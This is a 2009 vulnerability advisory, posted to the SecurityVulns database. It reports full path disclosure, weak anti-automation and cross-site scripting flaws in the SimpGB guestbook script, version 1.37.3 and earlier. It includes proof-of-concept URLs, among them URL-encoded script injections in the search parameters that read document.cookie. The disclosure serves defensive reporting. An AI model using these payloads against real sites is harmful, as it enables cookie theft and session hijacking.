Security Advisory: Vulnerabilities in SimpGB - security vulnerabilities database

[EN] securityvulns.ru
no-pyccku

Related information
  Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  AssetsSoSimple supplier_admin.php Supplier Field XSS
  Auto Manager admin.cgi Multiple Field XSS

From: MustLive <mustlive_(at)_websecurity.com.ua>
Date: 19.11.2009
Subject: Vulnerabilities in SimpGB

Hello 3APA3A!

I want to warn you about security vulnerabilities in SimpGB.

These are Full path disclosure, Insufficient Anti-automation and
Cross-Site Scripting vulnerabilities.

Full path disclosure:

http://site/admin/index.php?lang=1

http://site/admin/pwlost.php?lang=1

http://site/admin/usered.
php?lang=1&mode=comment&input_entrynr=44&entrylang=en

Insufficient Anti-automation:

http://site/admin/usered.
php?lang=en&mode=comment&input_entrynr=44&entrylang=en

Login and password are fixed and are set at the page.

XSS:

http://site/search.
php?searchvalues=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/search.
php?category=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

Vulnerable are SimpGB V1.37.3 and previous versions (and possibly next
versions).

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/3460/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

test server